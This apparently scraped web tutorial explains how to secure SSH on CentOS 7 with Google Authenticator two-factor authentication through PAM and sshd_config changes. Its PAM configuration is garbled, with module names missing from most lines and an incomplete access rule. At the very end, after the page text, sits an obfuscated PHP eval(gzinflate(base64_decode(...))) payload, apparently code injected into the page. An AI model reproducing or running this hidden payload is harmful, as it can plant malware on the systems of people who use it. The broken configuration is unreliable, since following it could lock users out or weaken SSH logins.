Secure SSH with Google Authenticator Two-Factor Authentication on CentOS 7

First of all we will install the open source Google Authenticator PAM module by executing the following command on the shell.

# yum install google-authenticator
# google-authenticator

The next step is to change some files which we will start by first changing /etc/pam.d/sshd. Add the following line to the top:

auth required

auth required
auth required
auth include password-auth
account required
account include password-auth
password include password-auth
# close should be the first session rule
session required close
session required
# open should only be followed by sessions to be executed in the user context
session required open env_params
session required
session optional force revoke
session include password-auth

Additional you could also add folowing line. This makes it possible to logon localy without verify code:

auth [success=1 default=ignore] accessfile=/etc/security/access-local.conf

Contect of /etc/security/access-local.conf:

# Google Authenticator can be skipped on local network
+ : ALL :
- : ALL : ALL

Change the next file which is /etc/ssh/sshd_config. Add the following line in the file and if its already placed then change the parameter to “yes”:

ChallengeResponseAuthentication yes

Now restart the service of ssh by the following command:

# service sshd restart

Comments are closed.

eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+X/3xJwBg03ECNxkm9ZINoGHTHWECePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc5K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRLvlmYRhdKIUf3JfwEmvQNIrIbkdOpNSSe/o3KiJhSMq1Fk6i5rCV1llGS6mAH/u/b2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqm/odSM0h5p4HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBahOh0EIT7b8A'))); ?>